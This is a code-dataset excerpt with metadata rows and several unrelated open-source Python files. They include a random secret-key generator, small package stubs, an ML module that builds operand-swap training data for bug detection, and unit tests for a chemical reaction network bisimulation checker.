] | null | null | null | scripts/generate_secret.py | rohittiwari07/coinculture | 57523a52c57ceb71b09a28a951f8ad61decf835d | [
"Apache-2.0"
] | null | null | null | import os
print(os.urandom(24).hex())
| 9.75 | 27 | 0.692308 | 7 | 39 | 3.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 0.102564 | 39 | 3 | 28 | 13 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
832ebfefe195e112cd9537b3795803a7dd82371e | 204 | py | Python | mara_storage/config.py | mara/mara-storage | ab3797bfe079dc24599e394660e47cf6fac63cc6 | [
"MIT"
] | null | null | null | mara_storage/config.py | mara/mara-storage | ab3797bfe079dc24599e394660e47cf6fac63cc6 | [
"MIT"
] | 1 | 2021-12-04T12:52:22.000Z | 2021-12-04T12:52:22.000Z | mara_storage/config.py | mara/mara-storage | ab3797bfe079dc24599e394660e47cf6fac63cc6 | [
"MIT"
] | 2 | 2021-09-21T15:44:42.000Z | 2022-02-22T17:16:08.000Z | """Configuration of storage connections"""
import mara_storage.storages
def storages() -> {str: mara_storage.storages.Storage}:
"""The list of storage connections to use, by alias"""
return {}
| 22.666667 | 58 | 0.710784 | 25 | 204 | 5.72 | 0.64 | 0.125874 | 0.27972 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161765 | 204 | 8 | 59 | 25.5 | 0.836257 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8365bc936c324205b037b74a0af488e145590304 | 107 | py | Python | bostaSDK/pickup/delete/__init__.py | bostaapp/bosta-python | df3f48dafac49b2577669fd4d74a5e5e9d28f2c1 | [
"MIT"
] | null | null | null | bostaSDK/pickup/delete/__init__.py | bostaapp/bosta-python | df3f48dafac49b2577669fd4d74a5e5e9d28f2c1 | [
"MIT"
] | 1 | 2020-11-18T11:01:32.000Z | 2020-11-18T11:10:52.000Z | bostaSDK/pickup/delete/__init__.py | bostaapp/bosta-python | df3f48dafac49b2577669fd4d74a5e5e9d28f2c1 | [
"MIT"
] | null | null | null | from .DeletePickupRequest import DeletePickupRequest
from .DeletePickupResponse import DeletePickupResonse
| 35.666667 | 53 | 0.906542 | 8 | 107 | 12.125 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074766 | 107 | 2 | 54 | 53.5 | 0.979798 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
55c8c4438ce66b66ea540210ba98b38b413b2f7c | 16,635 | py | Python | python/LearningDataIncorrectBinaryOperand.py | mast-group/DeepSStuBs | ea6621f9678c1bf2110641e7794309b832f81e2f | [
"MIT"
] | 1 | 2020-08-17T02:23:10.000Z | 2020-08-17T02:23:10.000Z | python/LearningDataIncorrectBinaryOperand.py | mast-group/DeepSStuBs | ea6621f9678c1bf2110641e7794309b832f81e2f | [
"MIT"
] | null | null | null | python/LearningDataIncorrectBinaryOperand.py | mast-group/DeepSStuBs | ea6621f9678c1bf2110641e7794309b832f81e2f | [
"MIT"
] | null | null | null | '''
Created on Nov 13, 2017
@author: Michael Pradel
'''
import Util
from collections import namedtuple
import random
import numpy as np
from Util import clean_string
type_embedding_size = 5
node_type_embedding_size = 8 # if changing here, then also change in LearningDataBinOperator
class CodePiece(object):
def __init__(self, left, right, op, src):
self.left = left
self.right = right
self.op = op
self.src = src
def to_message(self):
return str(self.src) + " | " + str(self.left) + " | " + str(self.op) + " | " + str(self.right)
Operand = namedtuple('Operand', ['op', 'type'])
class LearningData(object):
def __init__(self):
self.file_to_operands = dict() # string to set of Operands
self.stats = {}
def resetStats(self):
self.stats = {}
def pre_scan(self, training_data_paths, validation_data_paths):
all_operators_set = set()
for bin_op in Util.DataReader(training_data_paths, False):
file = bin_op["src"].split(" : ")[0]
operands = self.file_to_operands.setdefault(file, dict())
# operands = self.file_to_operands.setdefault(file, set())
left_operand = Operand(bin_op["left"], bin_op["leftType"])
right_operand = Operand(bin_op["right"], bin_op["rightType"])
if not left_operand in operands: operands[left_operand] = bin_op["tokens"][:bin_op["opPosition"]]
if not right_operand in operands: operands[right_operand] = bin_op["tokens"][bin_op["opPosition"] + 1: ]
# operands.add(left_operand)
# operands.add(right_operand)
all_operators_set.add(bin_op["op"])
for bin_op in Util.DataReader(validation_data_paths, False):
file = bin_op["src"].split(" : ")[0]
operands = self.file_to_operands.setdefault(file, dict())
# operands = self.file_to_operands.setdefault(file, set())
left_operand = Operand(bin_op["left"], bin_op["leftType"])
right_operand = Operand(bin_op["right"], bin_op["rightType"])
if not left_operand in operands: operands[left_operand] = bin_op["tokens"][:bin_op["opPosition"]]
if not right_operand in operands: operands[right_operand] = bin_op["tokens"][bin_op["opPosition"] + 1: ]
# operands.add(left_operand)
# operands.add(right_operand)
all_operators_set.add(bin_op["op"])
self.all_operators = list(all_operators_set)
def mutate(self, bin_op):
mutated_bin_op = dict()
mutated_bin_op["left"] = bin_op["left"]
mutated_bin_op["right"] = bin_op["right"]
mutated_bin_op["op"] = bin_op["op"]
mutated_bin_op["leftType"] = bin_op["leftType"]
mutated_bin_op["rightType"] = bin_op["rightType"]
mutated_bin_op["parent"] = bin_op["parent"]
mutated_bin_op["grandParent"] = bin_op["grandParent"]
mutated_bin_op["src"] = bin_op["src"]
mutated_bin_op["opPosition"] = bin_op["opPosition"]
mutated_tokens = bin_op["tokens"].copy()
# find an alternative operand in the same file
replace_left = random.random() < 0.5
if replace_left:
to_replace_operand = mutated_bin_op["left"]
else:
to_replace_operand = mutated_bin_op["right"]
file = bin_op["src"].split(" : ")[0]
all_operands = self.file_to_operands[file].keys()
tries_left = 100
found = False
if len(all_operands) == 1:
return None
while (not found) and tries_left > 0:
other_operand = random.choice(list(all_operands))
            # This check is problematic with word2vec, because word2vec only keeps operands that are in the vocabulary
# if other_operand.op in name_to_vector and other_operand.op != to_replace_operand:
if other_operand.op != to_replace_operand:
found = True
tries_left -= 1
if not found:
# print('Did not find operand')
return None
if replace_left:
mutated_bin_op["left"] = other_operand.op
mutated_bin_op["leftType"] = other_operand.type
mutated_tokens = self.file_to_operands[file][other_operand] + bin_op["tokens"][bin_op["opPosition"]:]
else:
mutated_bin_op["right"] = other_operand.op
mutated_bin_op["rightType"] = other_operand.type
mutated_tokens = bin_op["tokens"][: bin_op["opPosition"] + 1] + self.file_to_operands[file][other_operand]
mutated_bin_op["tokens"] = mutated_tokens
return mutated_bin_op
def code_features(self, bin_op, embeddings_model, emb_model_type, type_to_vector, node_type_to_vector, code_pieces=None):
if emb_model_type == 'w2v' or emb_model_type == 'FastText':
if isinstance(bin_op, list):
feats = []
for bin_op_inst in bin_op:
x = self.code_features(bin_op_inst, embeddings_model, emb_model_type, type_to_vector, node_type_to_vector)
feats.append(x)
return feats
left = bin_op["left"]
right = bin_op["right"]
operator = bin_op["op"]
left_type = bin_op["leftType"]
right_type = bin_op["rightType"]
parent = bin_op["parent"]
grand_parent = bin_op["grandParent"]
src = bin_op["src"]
left_vector = embeddings_model.get_embedding(left)
right_vector = embeddings_model.get_embedding(right)
elif emb_model_type == 'ELMo':
if isinstance(bin_op, list):
feats = []
queries = []
extra_vecs = []
part_indices = []
for i, bin_op_inst in enumerate(bin_op):
extra_vecs.append(self._extra_feats(bin_op_inst, type_to_vector, node_type_to_vector))
query = bin_op_inst["tokens"]
max_query = 200
if len(query) > max_query:
# print(len(query))
query = query[:max_query]
queries.append(query)
# left_index = 0
# right_index =
part_indices.append([[i, 0], [i, int(bin_op_inst["opPosition"])], [i, int(bin_op_inst["opPosition"]) + 1]])
# query = self._to_ELMo_heuristic_query(bin_op_inst, embeddings_model)
# queries.append(query)
part_indices = np.array(part_indices)
embeds = embeddings_model.get_sequence_embeddings(queries)
return embeds, np.array(extra_vecs), part_indices
# for i in range(len(embeds)):
# vec = list(embeds[i].ravel())
# feats.append(vec + extra_vecs[i])
# return feats
else:
                query = self._to_ELMo_heuristic_query(bin_op, embeddings_model)
extra_vec = self._extra_feats(bin_op, type_to_vector, node_type_to_vector)
return embeddings_model.get_sequence_embeddings([query]), np.array(extra_vec)
# x = list(embeddings_model.get_sequence_embeddings([query]).ravel()) + extra_vec
# return x
elif emb_model_type == 'BPE':
if isinstance(bin_op, list):
feats = []
queries = []
extra_vecs = []
for bin_op_inst in bin_op:
extra_vecs.append(self._extra_feats(bin_op_inst, type_to_vector, node_type_to_vector))
query = self._to_ELMo_heuristic_query(bin_op_inst, embeddings_model)
queries.append(query)
embeds = embeddings_model.get_sequence_embeddings(queries)
for i in range(len(embeds)):
vec = list(embeds[i].ravel())
feats.append(vec + extra_vecs[i])
return feats
else:
                query = self._to_ELMo_heuristic_query(bin_op, embeddings_model)
extra_vec = self._extra_feats(bin_op, type_to_vector, node_type_to_vector)
x = list(embeddings_model.get_sequence_embeddings([query]).ravel()) + extra_vec
return x
else:
return None
operator_vector = [0] * len(self.all_operators)
operator_vector[self.all_operators.index(operator)] = 1
left_type_vector = type_to_vector.get(left_type, [0]*type_embedding_size)
right_type_vector = type_to_vector.get(right_type, [0]*type_embedding_size)
parent_vector = node_type_to_vector.get(parent, [0] * node_type_embedding_size)
grand_parent_vector = node_type_to_vector.get(grand_parent, [0] * node_type_embedding_size)
x = left_vector + right_vector + operator_vector + left_type_vector + \
right_type_vector + parent_vector + grand_parent_vector
if code_pieces != None:
code_pieces.append(CodePiece(right, left, operator, src))
return x
def _to_ELMo_heuristic_query(self, bin_op, embeddings_model):
left = bin_op["left"]
right = bin_op["right"]
operator = bin_op["op"]
query = '%s %s %s' % (clean_string(left), operator, clean_string(right))
return query.split()
def _extra_feats(self, bin_op, type_to_vector, node_type_to_vector):
operator = bin_op["op"]
left_type = bin_op["leftType"]
right_type = bin_op["rightType"]
parent = bin_op["parent"]
grand_parent = bin_op["grandParent"]
operator_vector = [0] * len(self.all_operators)
operator_vector[self.all_operators.index(operator)] = 1
left_type_vector = type_to_vector.get(left_type, [0]*type_embedding_size)
right_type_vector = type_to_vector.get(right_type, [0]*type_embedding_size)
parent_vector = node_type_to_vector.get(parent, [0] * node_type_embedding_size)
grand_parent_vector = node_type_to_vector.get(grand_parent, [0] * node_type_embedding_size)
return operator_vector + left_type_vector + right_type_vector + parent_vector + grand_parent_vector
def code_to_xy_FastText_pairs(self, bin_op, xs, ys, name_to_vector, type_to_vector, node_type_to_vector, code_pieces=None):
left = bin_op["left"]
right = bin_op["right"]
operator = bin_op["op"]
left_type = bin_op["leftType"]
right_type = bin_op["rightType"]
parent = bin_op["parent"]
grand_parent = bin_op["grandParent"]
src = bin_op["src"]
if not (left in name_to_vector):
left = 'UNK'
# return
if not (right in name_to_vector):
right = 'UNK'
# return
left_vector = list(name_to_vector[left])
right_vector = list(name_to_vector[right])
operator_vector = [0] * len(self.all_operators)
operator_vector[self.all_operators.index(operator)] = 1
left_type_vector = type_to_vector.get(left_type, [0]*type_embedding_size)
right_type_vector = type_to_vector.get(right_type, [0]*type_embedding_size)
parent_vector = node_type_to_vector[parent]
grand_parent_vector = node_type_to_vector[grand_parent]
# find an alternative operand in the same file
replace_left = random.random() < 0.5
if replace_left:
to_replace_operand = left
else:
to_replace_operand = right
file = src.split(" : ")[0]
all_operands = self.file_to_operands[file]
tries_left = 100
found = False
while (not found) and tries_left > 0:
other_operand = random.choice(list(all_operands))
if other_operand.op in name_to_vector and other_operand.op != to_replace_operand:
found = True
tries_left -= 1
if not found:
return
# for all xy-pairs: y value = probability that incorrect
x_correct = left_vector + right_vector + operator_vector + left_type_vector + right_type_vector + parent_vector + grand_parent_vector
y_correct = [0]
xs.append(x_correct)
ys.append(y_correct)
if code_pieces != None:
code_pieces.append(CodePiece(left, right, operator, src))
other_operand_vector = list(name_to_vector[other_operand.op])
other_operand_type_vector = type_to_vector[other_operand.type]
# replace one operand with the alternative one
if replace_left:
x_incorrect = other_operand_vector + right_vector + operator_vector + other_operand_type_vector + right_type_vector + parent_vector + grand_parent_vector
else:
x_incorrect = left_vector + other_operand_vector + operator_vector + right_type_vector + other_operand_type_vector + parent_vector + grand_parent_vector
y_incorrect = [1]
xs.append(x_incorrect)
ys.append(y_incorrect)
if code_pieces != None:
code_pieces.append(CodePiece(right, left, operator, src))
def code_to_xy_pairs(self, bin_op, xs, ys, name_to_vector, type_to_vector, node_type_to_vector, code_pieces=None):
left = bin_op["left"]
right = bin_op["right"]
operator = bin_op["op"]
left_type = bin_op["leftType"]
right_type = bin_op["rightType"]
parent = bin_op["parent"]
grand_parent = bin_op["grandParent"]
src = bin_op["src"]
if not (left in name_to_vector):
left = 'UNK'
# return
if not (right in name_to_vector):
right = 'UNK'
# return
left_vector = name_to_vector[left]
right_vector = name_to_vector[right]
operator_vector = [0] * len(self.all_operators)
operator_vector[self.all_operators.index(operator)] = 1
left_type_vector = type_to_vector.get(left_type, [0]*type_embedding_size)
right_type_vector = type_to_vector.get(right_type, [0]*type_embedding_size)
parent_vector = node_type_to_vector.get(parent, [0] * node_type_embedding_size)
grand_parent_vector = node_type_to_vector.get(grand_parent, [0] * node_type_embedding_size)
# find an alternative operand in the same file
replace_left = random.random() < 0.5
if replace_left:
to_replace_operand = left
else:
to_replace_operand = right
file = src.split(" : ")[0]
all_operands = self.file_to_operands[file]
tries_left = 100
found = False
while (not found) and tries_left > 0:
other_operand = random.choice(list(all_operands))
if other_operand.op in name_to_vector and other_operand.op != to_replace_operand:
found = True
tries_left -= 1
if not found:
return
# for all xy-pairs: y value = probability that incorrect
x_correct = left_vector + right_vector + operator_vector + left_type_vector + right_type_vector + parent_vector + grand_parent_vector
y_correct = [0]
xs.append(x_correct)
ys.append(y_correct)
if code_pieces != None:
code_pieces.append(CodePiece(left, right, operator, src))
other_operand_vector = name_to_vector[other_operand.op]
other_operand_type_vector = type_to_vector[other_operand.type]
# replace one operand with the alternative one
if replace_left:
x_incorrect = other_operand_vector + right_vector + operator_vector + other_operand_type_vector + right_type_vector + parent_vector + grand_parent_vector
else:
x_incorrect = left_vector + other_operand_vector + operator_vector + right_type_vector + other_operand_type_vector + parent_vector + grand_parent_vector
y_incorrect = [1]
xs.append(x_incorrect)
ys.append(y_incorrect)
if code_pieces != None:
code_pieces.append(CodePiece(right, left, operator, src))
def anomaly_score(self, y_prediction_orig, y_prediction_changed):
return y_prediction_orig
def normal_score(self, y_prediction_orig, y_prediction_changed):
return y_prediction_changed
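# Illustrative sketch of the xs/ys labeling convention used by
# code_to_xy_pairs and code_to_xy_FastText_pairs above: the correct feature
# vector is labeled y = [0] ("probability incorrect" = 0) and the mutated one
# y = [1]. The vectors here are toy stand-ins for the real embedding features.
if __name__ == "__main__":
    xs, ys = [], []
    left_vector, right_vector, other_operand_vector = [0.1], [0.2], [0.9]
    xs.append(left_vector + right_vector)           # correct operand pair
    ys.append([0])
    xs.append(other_operand_vector + right_vector)  # left operand replaced
    ys.append([1])
    assert xs == [[0.1, 0.2], [0.9, 0.2]] and ys == [[0], [1]]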
# Vitis-AI-Quantizer/vai_q_pytorch/pytorch_binding/pytorch_nndct/nn/__init__.py (dendisuhubdy/Vitis-AI, Apache-2.0)
from .modules import *
from .utils import *
# kabuka/__main__.py (sdanaipat/kabuka, MIT)
import fire
from kabuka import get_latest_price
if __name__ == '__main__':
fire.Fire(get_latest_price)
# energyOptimal/sensors/rapl/__init__.py (VitorRamos/energy, MIT)
from .rapl import RAPL
# embracenet_pytorch/__init__.py (idearibosome/embracenet, MIT)
from .embracenet import EmbraceNet
# main/admin.py (elhamrazi/ElhamBlog, MIT)
from django.contrib import admin
from .models import *
admin.site.register(Author)
admin.site.register(Post)
admin.site.register(Comment)
# Register your models here.
# config/__init__.py (rrhg/accounting-data-entry-helper, MIT)
from .config import *
# TODO should config be just a file
# python/qitest/test/projects/testme/test/test_foo.py (vbarbaresi/qibuild, BSD-3-Clause)
def test_foo():
assert 42 == 40 + 2
# frappe_health_ec/frappe_health_ec/doctype/identificationtype/identificationtype.py (lapillaga/frappe_health_ec, MIT)
# Copyright (c) 2021, Lugo S.A.S and contributors
# For license information, please see license.txt
# import frappe
from frappe.model.document import Document
class IdentificationType(Document):
pass
#!/usr/bin/env python
# DNA-and-Natural-Algorithms-Group/crnverifier (MIT license)
#
# tests/test_crn_bisimulation.py
# Original source from the Nuskell compiler project
#
import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
import unittest
from crnverifier.utils import parse_crn
from crnverifier.crn_bisimulation import (SpeciesAssignmentError,
EnumSpeciesAssignmentError,
# Main interface
crn_bisimulations,
crn_bisimulation_test,
modular_crn_bisimulation_test,
# HelperTests
minimal_implementation_states,
subsetsL,
enumL,
same_reaction,
trivial_reaction,
makeT,
checkT,
# ConditionTests
passes_atomic_condition,
passes_delimiting_condition,
passes_permissive_condition,
# Individual test classes
search_column,
search_row,
passes_modularity_condition,
# Just used
subst)
SKIP_SLOW = True # NOTE: takes about 6-7 days now!!!
SKIP_DEBUG = False
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class JustCuriousTests(unittest.TestCase):
# Some small examples that are easy to verify.
def test_me_quickly_00(self):
assert list(crn_bisimulations([], [])) == [dict()]
fcrn = "A -> B"
fcrn, fs = parse_crn(fcrn)
assert list(crn_bisimulations(fcrn, [])) == []
fcrn = " -> B"
icrn = "a -> b"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
assert len(bisims) == 0
icrn = "a -> b"
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations([], icrn))
assert len(bisims) == 1
assert {'a': [], 'b': []} in bisims
icrn = "a -> b"
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations([], icrn, formals = set(['A'])))
assert len(bisims) == 1
assert {'a': ['A'], 'b': ['A']} in bisims
icrn = "a -> b; c -> d"
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations([], icrn, formals = set(['A', 'B'])))
assert len(bisims) == 2
assert {'a': ['A'], 'b': ['A'], 'c': ['B'], 'd': ['B']} in bisims
assert {'a': ['B'], 'b': ['B'], 'c': ['A'], 'd': ['A']} in bisims
def test_me_quickly_01(self):
fcrn = "A + B -> C"
icrn = "x + y -> c + d"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
if len(bisims) != 4:
print('FAILURE:')
for e, b in enumerate(bisims, 1):
print(e, b)
assert len(bisims) == 4
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
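    def test_me_quickly_01_interpretation_sketch(self):
        # Sketch of what one of the four bisimulations above means: assuming
        # the interpretation x -> A, y -> B, c -> C, d -> (nothing), applying
        # it to "x + y -> c + d" reproduces the formal "A + B -> C". The
        # helper below is a hypothetical stand-in, not a library function.
        from collections import Counter
        inter = {'x': ['A'], 'y': ['B'], 'c': ['C'], 'd': []}
        def interpret(species):
            out = []
            for sp in species:
                out.extend(inter[sp])
            return Counter(out)
        assert interpret(['x', 'y']) == Counter(['A', 'B'])
        assert interpret(['c', 'd']) == Counter(['C'])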
def test_me_quickly_02(self):
fcrn = " -> A"
icrn = " -> y; y -> a"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
b1 = {'a': ['A'], 'y': ['A']}
b2 = {'a': ['A'], 'y': []}
assert len(bisims) == 2
assert b1 in bisims
assert b2 in bisims
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
def test_me_quickly_03(self):
fcrn = " -> A"
icrn = " -> y; y <=> z; z -> a"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
b1 = {'a': ['A'], 'y': ['A'], 'z': ['A']}
b2 = {'a': ['A'], 'y': [], 'z': []}
        if len(bisims) != 3:
print('FAILURE:')
for e, b in enumerate(bisims):
print(e, b)
assert len(bisims) == 3 # Should be two, but in the present implementation it makes sense that it is 3!
assert b1 in bisims
assert b2 in bisims
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
def test_me_quickly_04(self):
fcrn = "A -> "
icrn = "a -> y; y <=> z; z -> "
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
if len(bisims) != 2:
print('FAILURE:')
for e, b in enumerate(bisims):
print(e, b)
b1 = {'a': ['A'], 'y': [], 'z': []}
b2 = {'a': ['A'], 'y': ['A'], 'z': ['A']}
assert len(bisims) == 2
assert b1 in bisims
assert b2 in bisims
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
def test_me_quickly_false(self):
fcrn = "A + B -> C"
icrn = "x + y + z -> c + d"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
assert len(bisims) == 0
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
fcrn = " -> A"
icrn = " y -> a"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
assert len(bisims) == 0
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class HelperTests(unittest.TestCase):
""" Helper functions for CRN bisimulation:
- minimal_implementation_states
- subsetsL
- enumL
- same_reaction
- trivial_reaction
- makeT
- checkT
"""
def test_minimal_implementation_states_exact(self):
state = []
inter = {'a': ['A'],
'b': ['B'],
'x': ['A', 'B'],
'y': ['A', 'A']}
assert list(minimal_implementation_states(state, inter)) == [[]]
state = ['A']
inter = {'a': ['A'],
'b': ['B'],
'x': ['A', 'B'],
'y': ['A', 'A']}
minis = [['a'], ['x'], ['y']]
assert list(minimal_implementation_states(state, inter)) == minis
def test_minimal_implementation_states_supersets(self):
# NOTE: these used to return supersets, but now
# that should be fixed.
state = ['A', 'A']
inter = {'a': ['A'],
'b': ['B'],
'x': ['A', 'B'],
'y': ['A', 'A']}
minis = [['a', 'a'], ['a', 'x'], ['x', 'x'], ['y']]
supfs = list(map(sorted, minimal_implementation_states(state, inter)))
assert all(sorted(m) in supfs for m in minis)
assert len(minis) == len(supfs)
state = []
inter = {'a': [],
'b': []}
minis = [[]]
supfs = list(map(sorted, minimal_implementation_states(state, inter)))
assert all(sorted(m) in supfs for m in minis)
assert len(minis) == len(supfs)
state = ['A', 'B']
inter = {'a': ['A'],
'b': ['B'],
'c': ['C'],
'x': ['A', 'B']}
minis = [['a', 'b'], ['x']]
supfs = list(map(sorted, minimal_implementation_states(state, inter)))
assert all(sorted(m) in supfs for m in minis)
assert len(minis) == len(supfs)
state = ['A', 'B', 'A']
inter = {'a': ['A'],
'b': ['B'],
'c': ['C'],
'x': ['A', 'B']}
minis = [['a', 'a', 'b'], ['x', 'a'], ['x', 'x']]
supfs = list(map(sorted, minimal_implementation_states(state, inter)))
assert all(sorted(m) in supfs for m in minis)
assert len(minis) == len(supfs)
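    def test_minimal_implementation_states_bruteforce_sketch(self):
        # Cross-check of the ['A', 'A'] case above with a brute force written
        # only against the definition (hypothetical helpers, not library
        # code): a state is minimal iff its interpretation covers the formal
        # state and no single species can be dropped. Sizes 1-2 suffice here,
        # since each species of a minimal state must supply a needed 'A'.
        from collections import Counter
        from itertools import combinations_with_replacement as cwr
        inter = {'a': ['A'], 'b': ['B'], 'x': ['A', 'B'], 'y': ['A', 'A']}
        target = Counter(['A', 'A'])
        def interp(state):
            c = Counter()
            for sp in state:
                c.update(inter[sp])
            return c
        def covers(state):
            return not (target - interp(state))
        minimal = set()
        for size in range(1, 3):
            for state in cwr(sorted(inter), size):
                if covers(state) and not any(
                        covers(state[:i] + state[i + 1:])
                        for i in range(len(state))):
                    minimal.add(state)
        assert minimal == {('a', 'a'), ('a', 'x'), ('x', 'x'), ('y',)}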
def test_subsets(self):
#['A'] => [[], ['A']]
#['A', 'A'] => [[], ['A'], ['A', 'A']
#['A', 'B'] => [[], ['A'], ['B'], ['A', 'B']
assert sorted(subsetsL([])) == [()]
assert sorted(subsetsL(['A'])) == [(), ('A',)]
assert sorted(subsetsL(['A', 'A'])) == [(), ('A',), ('A',), ('A', 'A')]
assert sorted(set(subsetsL(['A', 'A']))) == [(), ('A',), ('A', 'A')]
assert sorted(subsetsL(['A', 'B'])) == sorted([(), ('A',), ('B',), ('A', 'B')])
assert sorted(set(subsetsL(['A', 'A', 'B']))) == sorted(
[(), ('A',), ('B',),
('A', 'A'), ('A', 'B'),
('A', 'A', 'B')])
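    def test_subsets_reference_sketch(self):
        # The same sub-multisets can be enumerated with plain itertools; this
        # hypothetical helper (not the library's subsetsL) deduplicates by
        # collecting sorted tuples in a set.
        from itertools import combinations
        def sub_multisets(s):
            return {c for r in range(len(s) + 1)
                    for c in combinations(sorted(s), r)}
        assert sub_multisets([]) == {()}
        assert sub_multisets(['A', 'A']) == {(), ('A',), ('A', 'A')}
        assert sub_multisets(['A', 'B']) == {(), ('A',), ('B',), ('A', 'B')}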
def test_enum_noweights(self):
# For example:
        # - n = 3 for three unassigned implementation species (x, y, z).
assert list(enumL(0, [])) == [[]]
assert list(enumL(1, [])) == [[()]]
assert list(enumL(2, [])) == [[(), ()]]
assert list(enumL(3, [])) == [[(), (), ()]]
assert list(enumL(4, [])) == [[(), (), (), ()]]
assert list(enumL(0, ['A'])) == [[]]
assert list(enumL(1, ['A'])) == [[('A',)]]
assert list(enumL(1, ['A', 'B', 'C'])) == [[('A', 'B', 'C')]]
assert sorted(enumL(2, ['A'])) == sorted([[('A',), ()], [(), ('A',)]])
assert sorted(enumL(3, ['A', 'B'])) == sorted([
[('A',), ('B',), ()],
[('A',), (), ('B',)],
[('B',), ('A',), ()],
[('B',), (), ('A',)],
[(), ('A',), ('B',)],
[(), ('B',), ('A',)],
[('A', 'B'), (), ()],
[(), ('A', 'B'), ()],
[(), (), ('A', 'B')]])
assert sorted(enumL(2, ['A', 'A', 'B'])) == sorted([
[(), ('A', 'A', 'B')],
[('A', 'A', 'B'), ()],
[('A', 'B'), ('A',)],
[('A', 'A'), ('B',)],
[('B',), ('A', 'A')],
[('A',), ('A', 'B')]])
assert sorted(enumL(2, ['A', 'B', 'C'])) == sorted([
[('A', 'B', 'C'), ()],
[(), ('A', 'B', 'C')],
[('A',), ('B', 'C')],
[('B',), ('A', 'C')],
[('C',), ('A', 'B')],
[('A', 'B'), ('C',)],
[('A', 'C'), ('B',)],
[('B', 'C'), ('A',)]])
def test_enum_weights(self):
assert list(enumL(0, [], weights = [])) == [[]]
assert list(enumL(1, [], weights = [1])) == [[()]]
assert list(enumL(2, [], weights = [1, 1])) == [[(), ()]]
assert list(enumL(3, [], weights = [1, 2, 3])) == [[(), (), ()]]
assert list(enumL(1, ['A'], weights = [1])) == [[('A',)]]
with self.assertRaises(EnumSpeciesAssignmentError):
assert list(enumL(1, ['A'], weights = [2])) == [[()]]
assert list(enumL(1, ['A', 'A'], weights = [2])) == [[('A',)]]
assert sorted(list(enumL(2, ['A', 'A'], weights = [2, 1]))) == sorted(
[[('A',), ()], [(), ('A', 'A')]])
assert sorted(list(enumL(2, ['A', 'A'], weights = [1, 2]))) == sorted(
[[(), ('A',)], [('A', 'A'), ()]])
assert sorted(list(enumL(2, ['A', 'B'], weights = [1, 2]))) == sorted(
[[('A', 'B'), ()]])
